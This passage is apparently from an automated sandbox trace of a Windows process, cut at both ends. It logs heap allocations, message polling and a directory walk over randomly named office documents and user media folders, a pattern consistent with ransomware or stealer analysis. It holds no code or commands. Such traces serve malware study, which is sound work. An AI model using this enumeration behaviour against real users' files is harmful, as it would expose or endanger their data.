0x43e2160 [0073.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9018 [0073.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2280 [0073.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9018 | out: hHeap=0x1780000) returned 1 [0073.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2280 | out: hHeap=0x1780000) returned 1 [0073.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0073.827] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0073.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2170 [0073.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2280 [0073.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0073.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9018 [0073.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21a0 [0073.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9018 | out: hHeap=0x1780000) returned 1 [0073.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0073.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2280 | out: hHeap=0x1780000) returned 1 [0073.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0073.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2170 | out: hHeap=0x1780000) returned 1 [0073.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0073.828] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21a0 [0073.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bc0 [0073.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0073.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d88 [0073.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0073.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c98 | out: hHeap=0x1780000) returned 1 [0073.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0073.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2170 [0073.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391578 [0073.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e18 | out: hHeap=0x1780000) returned 1 [0073.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0073.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0073.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0073.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391578 | out: hHeap=0x1780000) returned 1 [0073.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2170 | out: hHeap=0x1780000) returned 1 [0073.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bc0 | out: hHeap=0x1780000) returned 1 [0073.828] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2280 [0073.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2280 | out: hHeap=0x1780000) returned 1 [0073.828] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0073.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0073.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0073.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2170 [0073.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2170 | out: hHeap=0x1780000) returned 1 [0073.828] FindNextFileW (in: hFindFile=0x41ac240, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b476440, ftCreationTime.dwHighDateTime=0x1d5ec00, ftLastAccessTime.dwLowDateTime=0x6a510e20, ftLastAccessTime.dwHighDateTime=0x1d5ef40, ftLastWriteTime.dwLowDateTime=0x6a510e20, ftLastWriteTime.dwHighDateTime=0x1d5ef40, nFileSizeHigh=0x0, nFileSizeLow=0x6cbd, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="HD2UssJoRg1BYp.csv", cAlternateFileName="HD2USS~1.CSV")) returned 1 [0073.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0073.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391578 [0073.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2280 [0073.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c98 | out: hHeap=0x1780000) returned 1 [0073.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0073.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0073.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391578 | out: hHeap=0x1780000) returned 1 [0073.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2280 | out: hHeap=0x1780000) returned 1 [0073.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0073.829] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.829] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21a0 [0073.829] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9018 [0073.829] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2280 [0073.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9018 | out: hHeap=0x1780000) returned 1 [0073.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2280 | out: hHeap=0x1780000) returned 1 [0073.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0073.829] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.829] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0073.829] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21a0 [0073.829] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2170 [0073.829] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797048 [0073.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9018 | out: hHeap=0x1780000) returned 1 [0073.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2280 | out: hHeap=0x1780000) returned 1 [0073.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2170 | out: hHeap=0x1780000) returned 1 [0073.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0073.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0073.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0073.829] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c98 | out: hHeap=0x1780000) returned 1 [0073.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0073.829] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.829] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.829] FindNextFileW (in: hFindFile=0x41ac240, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x746906c0, ftCreationTime.dwHighDateTime=0x1d5e1e8, ftLastAccessTime.dwLowDateTime=0xd2e63af0, ftLastAccessTime.dwHighDateTime=0x1d5f102, ftLastWriteTime.dwLowDateTime=0xd2e63af0, ftLastWriteTime.dwHighDateTime=0x1d5f102, nFileSizeHigh=0x0, nFileSizeLow=0x83cc, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="Lh2OVLi_4PS_2RxxQd.odp", cAlternateFileName="LH2OVL~1.ODP")) returned 1 [0073.829] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.830] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.830] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.830] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.830] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.830] FindNextFileW (in: hFindFile=0x41ac240, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ba22bc0, ftCreationTime.dwHighDateTime=0x1d5bbe6, ftLastAccessTime.dwLowDateTime=0xcebf87c0, ftLastAccessTime.dwHighDateTime=0x1d5e756, ftLastWriteTime.dwLowDateTime=0xcebf87c0, ftLastWriteTime.dwHighDateTime=0x1d5e756, nFileSizeHigh=0x0, nFileSizeLow=0x6f55, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="LI-IwwMLWnmp-I.pptx", cAlternateFileName="LI-IWW~1.PPT")) returned 1 [0073.830] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.830] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.830] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.830] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.830] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.830] FindNextFileW (in: hFindFile=0x41ac240, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e6e2450, ftCreationTime.dwHighDateTime=0x1d56c16, ftLastAccessTime.dwLowDateTime=0x39fc4f70, ftLastAccessTime.dwHighDateTime=0x1d56b9a, ftLastWriteTime.dwLowDateTime=0x39fc4f70, ftLastWriteTime.dwHighDateTime=0x1d56b9a, nFileSizeHigh=0x0, nFileSizeLow=0x11fc2, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="mnsjU.xlsx", cAlternateFileName="MNSJU~1.XLS")) returned 1 [0073.830] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.830] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.830] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.830] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.830] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.830] FindNextFileW (in: hFindFile=0x41ac240, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x8, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0073.830] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.830] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.830] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.830] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.830] FindNextFileW (in: hFindFile=0x41ac240, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x8, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0073.830] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.830] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.831] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.831] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.831] FindNextFileW (in: hFindFile=0x41ac240, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc1a0f60e, ftCreationTime.dwHighDateTime=0x1d47c35, ftLastAccessTime.dwLowDateTime=0xc1bc4716, ftLastAccessTime.dwHighDateTime=0x1d47c35, ftLastWriteTime.dwLowDateTime=0xc1bc4716, ftLastWriteTime.dwHighDateTime=0x1d47c35, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="My Shapes", cAlternateFileName="MYSHAP~1")) returned 1 [0073.831] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.831] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.831] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.831] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.831] FindNextFileW (in: hFindFile=0x41ac240, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x8, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0073.831] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.831] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.831] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.831] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.831] FindNextFileW (in: hFindFile=0x41ac240, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39980a90, ftCreationTime.dwHighDateTime=0x1d5d762, ftLastAccessTime.dwLowDateTime=0x4e494740, ftLastAccessTime.dwHighDateTime=0x1d5d0de, ftLastWriteTime.dwLowDateTime=0x4e494740, ftLastWriteTime.dwHighDateTime=0x1d5d0de, nFileSizeHigh=0x0, nFileSizeLow=0x15fcc, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="nDdxnatd.pptx", cAlternateFileName="NDDXNA~1.PPT")) returned 1 [0073.831] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.831] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.831] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.831] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.831] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.831] FindNextFileW (in: hFindFile=0x41ac240, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4814be60, ftCreationTime.dwHighDateTime=0x1d59a5e, ftLastAccessTime.dwLowDateTime=0x7b674560, ftLastAccessTime.dwHighDateTime=0x1d575df, ftLastWriteTime.dwLowDateTime=0x7b674560, ftLastWriteTime.dwHighDateTime=0x1d575df, nFileSizeHigh=0x0, nFileSizeLow=0x7490, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="NHgtkAPLnX.docx", cAlternateFileName="NHGTKA~1.DOC")) returned 1 [0073.831] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.831] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.832] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.832] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.832] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.832] FindNextFileW (in: hFindFile=0x41ac240, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf41dd590, ftCreationTime.dwHighDateTime=0x1d5d3cd, ftLastAccessTime.dwLowDateTime=0x5e6efc80, ftLastAccessTime.dwHighDateTime=0x1d59611, ftLastWriteTime.dwLowDateTime=0x5e6efc80, ftLastWriteTime.dwHighDateTime=0x1d59611, nFileSizeHigh=0x0, nFileSizeLow=0x13946, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="NwJd3dflnaF4DbF3Yn.xlsx", cAlternateFileName="NWJD3D~1.XLS")) returned 1 [0073.832] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.832] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.832] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.832] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.832] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.832] FindNextFileW (in: hFindFile=0x41ac240, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83fb2180, ftCreationTime.dwHighDateTime=0x1d5e306, ftLastAccessTime.dwLowDateTime=0x7511100, ftLastAccessTime.dwHighDateTime=0x1d5e6b5, ftLastWriteTime.dwLowDateTime=0x7511100, ftLastWriteTime.dwHighDateTime=0x1d5e6b5, nFileSizeHigh=0x0, nFileSizeLow=0x10245, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="O8- 8r.odt", cAlternateFileName="O8-8R~1.ODT")) returned 1 [0073.832] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.832] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.832] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.832] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.832] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.832] FindNextFileW (in: hFindFile=0x41ac240, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c3a9160, ftCreationTime.dwHighDateTime=0x1d5ea19, ftLastAccessTime.dwLowDateTime=0x30900180, ftLastAccessTime.dwHighDateTime=0x1d5e70e, ftLastWriteTime.dwLowDateTime=0x30900180, ftLastWriteTime.dwHighDateTime=0x1d5e70e, nFileSizeHigh=0x0, nFileSizeLow=0x13819, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="ooKroY8WpRTqCJ.xlsx", cAlternateFileName="OOKROY~1.XLS")) returned 1 [0073.832] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.832] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.832] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.832] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.832] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.832] FindNextFileW (in: hFindFile=0x41ac240, lpFindFileData=0x144ec90 | out: 